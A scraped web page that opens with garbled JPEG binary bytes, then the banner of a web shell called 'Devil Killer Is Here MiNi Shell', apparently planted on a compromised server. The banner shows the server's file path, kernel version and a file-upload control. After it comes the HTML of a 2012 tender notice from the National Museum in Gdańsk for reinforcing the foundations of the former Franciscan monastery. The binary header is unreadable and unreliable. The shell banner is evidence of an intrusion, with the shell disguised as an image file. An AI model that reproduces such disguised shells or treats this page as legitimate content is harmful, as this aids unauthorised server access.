JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/240619-N-2012.html

<p class="kh_header"><b>Gdańsk: Wykonanie w formule zaprojektuj i wykonaj wzmocnienia konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów z wykorzystaniem technologii mikropali i wzmocnienia podłoża gruntowego posadzek w krużgankach.</b><br>
<b>Numer ogłoszenia: 240619 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Gdańsku , ul. Toruńska 1, 80-822 Gdańsk, woj. pomorskie, tel. 058 301 70 61, faks (058) 301 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.narodowe.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w formule zaprojektuj i wykonaj wzmocnienia konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów z wykorzystaniem technologii mikropali i wzmocnienia podłoża gruntowego posadzek w krużgankach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie w formule zaprojektuj i wykonaj wzmocnienia konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów z wykorzystaniem technologii mikropali 
i wzmocnienia podłoża gruntowego posadzek w krużgankach,  obejmującego: 
1)wykonanie projektu technicznego na podstawie wyników badań opracowanych w 2011r - załącznik nr 1 i Programu funkcjonalno-użytkowego - załącznik nr 2 oraz uzyskanie decyzji pozwolenia na budowę,
2)wykonanie badań archeologicznych w obrębie wykonywanych robót budowlanych, o których mowa w pkt 3, zgodnie z Programem badań archeologicznych i ratunkowych w obszarze palowania i robót związanych
 z osuszaniem partii fundamentowych budynku poklasztornego Franciszkanów w Gdańsku, Gdańsk ul. Toruńska 1 - załącznik nr 3, wraz z pełnieniem nadzoru archeologicznego nad prowadzonymi robotami,
3)wykonanie na podstawie projektu, o którym mowa w pkt 1, robót budowlanych polegających na wzmocnieniu konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów z wykorzystaniem technologii mikropali i wzmocnieniu podłoża gruntowego posadzek w krużgankach. 

2.Budynek poklasztorny Franciszkanów (Gdańsk ul,Toruńska 1) wpisany jest do Rejestru Zabytków Województwa Pomorskiego - Nr 133 (dawny 367) Decyzją Wojewódzkiego Konserwatora Zabytków w Gdańsku z dn. 1971-04-20, obiekt znajduje się ponadto pod szczególną  ochroną , jako położony w obrębie obszaru XVII wiecznych  obwarowań Gdańska - UZNANEGO ZA POMNIK HISTORII,  Decyzją Prezydenta Rzeczpospolitej Polskiej nr 415 z dn. 8.09.1994 r.   

3.Zamówienie stanowi całość składającą  się z trzech elementów.

4.Prace projektowe:
1.Celem zamówienia jest wykonanie dokumentacji projektowej (łącznie ze złożeniem wniosku o wydanie decyzji pozwolenia na budowę) wzmocnienia konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów, zwanego dalej obiektem lub budynkiem, z wykorzystaniem technologii mikropali obejmującego wzmocnienie podłoża gruntowego posadzek w krużgankach, na podstawie wyników badań  opracowanych w 2011r. i pełnienie nadzoru autorskiego.
2.Celem dokumentacji projektowej jest uzyskanie rozwiązania technicznego, którego realizacja spowoduje wyeliminowanie przyczyn nierównomiernego osiadania partii fundamentowych budynku. Rozwiązanie to uwzględni założenia projektowe odrębnej dokumentacji projektowej, znajdującej się w dyspozycji Zamawiającego, dotyczącej sposobu ograniczenia i wyeliminowania zawilgocenia fundamentów i przyziemia budynku poklasztornego.
3.Przedmiot zamówienia dotyczący prac projektowych obejmuje:
1)projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych,  
2)projekt wykonawczy, który powinien uwzględniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do zrealizowania przedmiotu    umowy oraz kontroli przez zamawiającego 
3)pozwolenia, uzgodnienia i opinie wymagane odrębnymi przepisami,
4)uzyskanie pozwolenia na budowę
5)pełnienie nadzoru autorskiego nad realizacją robót wykonywanych na podstawie projektu od podpisania umowy  2012 r. do 30 listopada 2013 r. 
4.Zamawiający udostępni Wykonawcy posiadane wyniki badań geologicznych, konstrukcyjnych, konserwatorskich i częściowych archeologicznych zawartych w:
1)dokumentacji badawczej: Analiza posadowienia fundamentów oraz określenie stanu technicznego przyziemia budynku głównego Muzeum Narodowego w Gdańsku wraz ze wskazaniem ewentualnych zagrożeń dla konstrukcji złożonej budynku,
2)dokumentacji badawczej: Wyniki badań konserwatorskich,
3)dokumentacji badawczej: Wyniki badań archeologicznych.
5.Zamawiający udostępni Wykonawcy także Projekt wykonania izolacji przeciwwodnych partii fundamentowych budynku poklasztornego Franciszkanów - etap I
6.Wykonawca zobowiązany jest do współpracy z autorami badań specjalistycznych 
w celu uzyskania najkorzystniejszych rozwiązań uwzględniających walory historyczne i zabytkowe obiektu.
7.Zamawiany projekt musi przewidzieć konieczność wprowadzenia nadzoru archeologicznego w trakcie realizacji zaplanowanych robót.
8.Projekt wykonawczy musi zawierać harmonogram robót uwzględniający etapowanie.
9.Wykonawca dostarczy dokumentację stanowiącą przedmiot umowy, w postaci:
1)projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych, w 5 egz. wydruku papierowego
2)projektu wykonawczego, który powinny uwzględniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do zrealizowania przedmiotu    umowy oraz kontroli przez zamawiającego, w 3 egz. wydruku papierowego
3)pozwoleń, uzgodnień i opinii wymaganych odrębnymi przepisami,
10.Dokumentacja projektowa zostanie przekazana także w zapisie cyfrowym na płycie DVD - 2 szt. formacie .dwg, .pdf, .doc.
11.Wykonawca dostarczy Zamawiającemu  potwierdzenie złożenia w imieniu Zamawiającego wniosku o wydanie decyzji pozwolenia na budowę do Urzędu Miejskiego w Gdańsku, który będzie podstawą do wzajemnych rozliczeń w oparciu o niniejszą umowę. 
12.Wykonawca wykona kompletną dokumentację projektową zgodnie z obowiązującymi przepisami, do której dołączy oświadczenie, że jest ona wykonana zgodnie z umową, zgodna ze stanem faktycznym, że została wykonana w całości, w stanie kompletnym z punktu widzenia celu, któremu na służyć.
13.Zamówienie  będzie realizowane pod nadzorem przedstawiciela Zamawiającego - rzeczoznawcy upoważnionego do bieżących uzgodnień z głównym projektantem 
i projektantami, podczas realizacji zamówienia.
14.W latach od 2012 do 2013 roku przewiduje się  realizację robót związanych ze wzmocnieniem konstrukcji budynku poklasztornego na podstawie zamawianej dokumentacji projektowej.
15.Zakres nadzoru autorskiego o którym mowa w  ust. 4 pkt 3.2.  obejmuje:   
1)uzgadnianie możliwości wprowadzenia rozwiązań zamiennych,
2)wyjaśnienie wątpliwości dotyczących rozwiązań przyjętych w dokumentacji projektowej, o ile potrzeba tych wyjaśnień nie jest spowodowana błędem Wykonawcy,
3)doprecyzowanie technologii i harmonogramu wykonania robót
16.Maksymalnie przewiduje się 10 pobytów na placu budowy w czasie określonym 
w ust.14.
17.Nadzór autorski w zakresie określonym w § 1. ust. 19, świadczony będzie odpłatnie tylko na żądanie Zamawiającego, przesłanego Wykonawcy faksem, mailem.
18.Podstawa prawna realizacji zamówienia dotycząca prac projektowych:
4)Ustawa z dnia 23 lipca 2003 r.o ochronie zabytków i opiece nad zabytkami (Dz.U. z 2003 nr 162 poz. 1568 z późniejszymi zmianami)
5)Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2010 nr 243 poz. 1623 z późniejszymi zmianami)
6)Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, na potrzeby przeprowadzenia postępowań o zamówienia publiczne.
19.Przewidywany termin wykonania zamówienia dokumentacji projektowej tj. zakończenia realizacji zadania: 14 dni od podpisania umowy. 
20.Za termin zakończenia prac określa się przekazanie MNG potwierdzenia złożenia  dokumentacji w nadzorze budowlanym do uzyskania pozwolenia na budowę.
5.Prace badawcze archeologiczne w obszarze objętym robotami budowlanymi 

Przedmiotem zamówienia w zakresie wykonania badań archeologicznych jest wykonanie dwóch zadań:
Zadania 1 - wykonanie badań archeologicznych i dokumentacji 
z przeznaczeniem do wykorzystania przy tworzeniu dokumentacji projektowej, o której mowa w ust.1 punkt 2.  w budynku poklasztornym Franciszkanów w Gdańsku.  Szczegółowy opis w Załączniku nr 3.
Zadania 2 - pełnienie nadzoru archeologicznego nad prowadzonymi robotami budowlanymi na podstawie zamawianej dokumentacji projektowej w latach 2012 -2013.

1.Wykonawca zobowiązuje się do wykonania badań archeologicznych i dokumentacji objętych Zadaniem 1  , zgodnie z obowiązującym prawem  - Rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U.11.165.987), i decyzją Pomorskiego Wojewódzkiego Konserwatora Zabytków w Gdańsku, uzgodnieniami niniejszej umowy oraz sztuką zawodową.
2.Wykonawca zobowiązuje się przekazać Zamawiającemu po dwa kompletne egzemplarze dokumentacji w wersji papierowej oraz po jednym egzemplarzu dokumentacji w wersji elektronicznej z przeprowadzonych badań archeologicznych w ramach Zadania 1 i 2.
3.Wykonawca zobowiązuje się do bieżącej współpracy w trakcie wykonywania badań z   wykonawcami projektu   oraz do przekazywania pozyskanych istotnych informacji do wykorzystania w projekcie .
4.Wykonawca zobowiązany jest przekazać wydobyte w trakcie badań archeologicznych zabytki archeologiczne Zamawiającemu zgodnie z Decyzją  Pomorskiego Wojewódzkiego Konserwatora Zabytków w Gdańsku.
5.Wykonawca zapewni organizację wykonania wykopu.
6.Wykonawca we współpracy z firmą budowlaną prowadzącą roboty budowlane zapewni zabezpieczenie - oszalowanie stanowisk archeologicznych. W przypadku wykopów prowadzonych poza budynkiem wykonawca wykona na okres zimowy zadaszenia wykopów wg. dokumentacji projektowej posiadanej przez Zamawiającego.
7.W ramach nadzoru archeologicznego - Zadanie 2 przewiduje się maksymalnie 
10 pobytów na placu budowy w czasie określonym w zadaniu.
8.Termin wykonania   Zadania 1, strony ustalają na dzień 24 grudnia 2012 roku.
9.Termin wykonania   Zadania 2, strony ustalają na dzień 30 listopada 2013 r.

6.Roboty budowlane w formule zaprojektuj i wykonaj

Przedmiotem zamówienia w zakresie wykonania robót budowlanych jest wykonanie na podstawie zamawianego w niniejszym postępowaniu  projektu, o którym mowa 
w ust.1 pkt 1,   wzmocnienia konstrukcji ścian fundamentowych zabytkowego budynku poklasztornego Franciszkanów z wykorzystaniem technologii mikropali i wzmocnieniu podłoża gruntowego posadzek w krużgankach. 
1.Wykonawca zrealizuje przedmiot umowy w zakresie robót budowlanych na podstawie projektu w terminie do dnia 9 grudnia 2013 roku.
2.Wykonawca dostarczy przed podpisaniem umowy polisę OC na kwotę nie mniejszą niż 100.000zł. 
3.Roboty budowlane zostaną zrealizowane przy uwzględnieniu szczegółowych warunków opisanych w projekcie umowy - Załącznik 6.
4.Wykonawca wykona zamówienie w sposób gwarantujący spełnienie warunków:
1)Ustawy z dnia 7 lipca 1994 r Prawo Budowlane,
2)Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75 poz. 690),
3)Rozporządzenia Ministra Kultury z dnia 15.10.2003 r. w sprawie zabezpieczenia zbiorów w muzeach przed pożarami, kradzieżami i innymi niebezpieczeństwami grożącymi zniszczeniem lub utratą muzealiów oraz sposobów przygotowania zbiorów do ewakuacji w razie powstania zagrożenia (Dz.U. z 2003 r. Nr 193, poz. 1892 ze zm.)
4)Ustawy o badaniach i certyfikacji z dnia 03.04.1993r (Dz. U. 55/93 z późniejszymi zmianami)
5)Ustawy o normalizacji z dnia 12.09.2002 r. (Dz. U. 169/2002),
6)Rozporządzenia Ministra Infrastruktury z dnia 12.04.2002r w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. 75/2002) oraz nowelizacja z dnia 07.04.2004r 
(Dz. U. 109 z dnia 12.05.2004r)
7)obowiązujących Polskich Norm i norm branżowych,
8)właściwych przepisów bhp i ppoż
 
5. Do wykonania zamówienia Wykonawca użyje materiałów własnych. Wszystkie materiały użyte do wykonania przedmiotu zamówienia powinny posiadać stosowne atesty i certyfikaty dopuszczające je do stosowania w budownictwie. 
6. Roboty należy prowadzić z poszanowaniem interesów osób trzecich, która w szczególności polega na:
- zapewnieniu dostępu do drogi publicznej
- ochronie przed pozbawieniem możliwości korzystania z wody, kanalizacji, energii    elektrycznej  
- ochronie przed pozbawieniem dopływu światła do pomieszczeń
-ochronie przed uciążliwościami powodowanymi przez hałas, wibracje, zakłócenia elektryczne,   
- ochronie przed zanieczyszczeniami powietrza, wody i gleby
7. Roboty mogą być także wykonywane w dni ustawowo wolne od pracy. 
8. Urządzenie placu budowlany leży w gestii Wykonawcy i na jego koszt.
9. Zaplecze należy zlokalizować na terenie, który obejmuje projekt i powinno zawierać 
w szczególności: zaplecze higieniczno - sanitarne, socjalne dla pracowników, miejsca pracy stanowiskowej, miejsca składowania materiałów, miejsca pracy maszyn 
i urządzeń  oraz przyłącza tymczasowe wodne i energetyczne oraz inne niezbędne elementy wynikające ze specyfikacji wykonywanych robót.
10. Wykonanie, uzgodnienie lokalizacji przyłączy tymczasowych, dla potrzeb budowy,  oraz rozliczenie się z gestorami sieci leży w gestii Wykonawcy.
11.Za całość oznakowania i zabezpieczenia robót w trakcie ich prowadzenia odpowiada Kierownik robót.
12. Wykonane prace będą objęte gwarancją przez 36 miesięcy od daty odbioru.
13. Ważne  uwagi:
a)Ze względu na zabytkowy charakter budynku, stanowiącego  element zespołu poklasztornego Franciszkanów, dla którego wykonywane są prace stanowiące przedmiot zamówienia, wskazanym jest aby kierownik budowy posiadał doświadczenie w zakresie prowadzenia robót budowlanych w obiektach zabytkowych oraz musi posiadać odpowiednie uprawnienia budowlane określone w Rozporządzeniu Ministra Infrastruktury z dnia 09 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150 poz. 1579).
b)Prace stanowiące przedmiot zamówienia będą nadzorowane przez Zamawiającego  pod względem budowlanym, archeologicznym i  konserwatorskim. Wszelkie rozwiązania szczegółowe mają być konsultowane z wyznaczonym przez Zamawiającego nadzorem budowlanym, archeologicznym i konserwatorskim.
c)Z uwagi na charakter obiektu i charakter prac , istnieje prawdopodobieństwo niemożności realizacji zadania w sposób ciągły. Sytuację tę może spowodować fakt, że budynek nie posiada kompleksowej dokumentacji badawczej konserwatorskiej i w sposób nieprzewidziany mogą wystąpić trudności 
np. w dostępie do partii fundamentów, murów objętych projektem, lub inne podobne  okoliczności.   W przypadku wystąpienia trudności z realizacją zadania, nie leżących po stronie wykonawcy, zamawiający na wniosek kierownika budowy lub inspektora nadzoru zawiesza bieg terminu wykonania zadania, do czasu usunięcia przeszkody uniemożliwiającej realizację zadania. Na powyższą okoliczność zostaje sporządzony stosowny protokół. . Z wyżej wymienionych powodów Zamawiający dopuszcza możliwość przesunięcia terminu wykonania przedmiotu zamówienia o czas niezbędny do usunięcia przeszkody uniemożliwiającej realizację zadania.
16.Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu budowy - Dziennika budowy.
17.Wywóz i utylizacja gruzu pochodzącego z prowadzonych robót należy do obowiązków Wykonawcy.
18.Zgodnie z Art. 145. Prawa zamówień publicznych, MNG zastrzega możliwość , w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,   odstąpienia od umowy lub jej części 
w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa  Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. 
19.Wybrany w przetargu Wykonawca przedłoży Zamawiającemu   do umowy harmonogram robót, polisę ubezpieczeniową, listę nazwisk wykonawców i podwykonawców biorących udział w realizacji zamówienia.
20.Zamawiający dopuszcza zlecenie podwykonawcom prac i  robót wskazanych w SIWZ. Zlecenie wykonania części robót podwykonawcom nie zmienia zobowiązań wykonawcy wobec zamawiającego za wykonanie tej części robót. Wykonawca jest odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i jego pracowników w takim samym stopniu jakby to były działania, uchybienia lub zaniedbania jego własnych pracowników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.22.32.10-1, 71.30.00.00-1, 71.32.00.00-7, 71.35.19.14-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości 20.000zł (słownie: dwadzieścia tysięcy złotych 00/100).
       2. Wadium będzie wniesione w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2007. Nr 42, poz. 275., z późn. zm. ) 
       3. Wadium wnoszone w pieniądzu należy przelać na rachunek Muzeum Narodowego w Gdańsku, ul. Toruńska 1, 80-822 Gdańsk, w Banku Millenium nr 42 1160 2202 0000 0000 6412 1898, przed upływem terminu składania ofert, z podaniem tytułu wadium - przetarg na  Wzmocnienie konstrukcji ścian w budynku Muzeum Narodowego w Gdańsku. Datą wniesienia wadium jest data uznania rachunku zamawiającego. 
       4. Wadium wnoszone w formie niepieniężnej powinno być wystawione na Muzeum Narodowe w Gdańsku. Oryginał dokumentu należy złożyć w opisanej kopercie wraz z ofertą, natomiast potwierdzoną za zgodność z oryginałem kserokopię dołączyć do oferty. Oryginalne dokumenty gwarancyjne-poręczenia będą zdeponowane w kasie Muzeum Narodowego w Gdańsku. 
       5. Dokument poręczenia/gwarancyjny powinien przewidywać utratę wadium na rzecz zamawiającego w przypadkach określonych w ust. 6. 
       6. Wykonawca traci wadium na rzecz Zamawiającego, wraz z odsetkami, w przypadku, gdy wykonawca, którego oferta została wybrana: 
       1) odmówi podpisania umowy na warunkach określonych w ofercie, 
       2) nie wniesie zabezpieczenia należytego wykonania umowy, 
       3) zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie wykonawcy. 
       7. Wadium musi zabezpieczać ofertę w całym okresie związania ofertą, który wynosi 30 od upływu terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie- posiadający niezbędna wiedzę i doświadczenie 
a)	w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie może wykazać wykonanie co najmniej trzech dokumentacji projektowych o podobnej problematyce konstrukcyjnej.
b)	w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie może wykazać wykonanie co najmniej jednej podobnej polegającej na zastosowaniu mikropali roboty  budowlanej polegającej na zmianach konstrukcyjnych w istniejących i użytkowanych budynkach zabytkowych oraz co najmniej 3 wykonanych w innych obiektach budowlanych.
c)	c) w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, może wykazać przeprowadzenie   co najmniej 5 prac badawczych archeologicznych w obszarze wpisanym do rejestru zabytków zabudowy miejskiej  średniowiecznej, świeckiej i sakralnej, może  wykazać posiadanie ugruntowanej wiedzy na temat miejskiej zabudowy średniowiecznej i umiejętność   interpretacji reliktów archeologicznych z tego okresu, potwierdzone dokumentacjami badawczymi. Ze względu na charakter zamawianych  prac badawczych i ich ścisłe powiązanie z  realizacją całości zamówienia konieczna jest sprawna analiza efektów i wyników prowadzonych wykopalisk. Załącznik nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami, które posiadają kwalifikacje zawodowe niezbędne do wykonania poszczególnych zakresów zamówienia   oraz posiadają należne uprawnienia :
a. uprawnienia do projektowania -   posiadają przygotowanie zawodowe i zdolność do projektowania w specjalności konstrukcyjno-budowlanej zgodnie z Prawem Budowlanym oraz  Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2005 r. w sprawie samodzielnych funkcji technicznych w budownictwie

 b. uprawnienia  do pełnienia samodzielnych funkcji  w budownictwie  - kierownika budowy, zgodnie z Prawem Budowlanym oraz  Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2005 r. w sprawie samodzielnych funkcji technicznych w budownictwie
c. uprawnienia  do prowadzenia badań archeologicznych - zgodnie z Rozporządzeniem  Ministra Kultury z 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych
 i poszukiwań ukrytych lub porzuconych zabytków ruchomych, tj. posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku  archeologia oraz odbyły po ukończeniu tych studiów, co najmniej 12-miesiczną praktykę zawodową w zakresie tych badań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
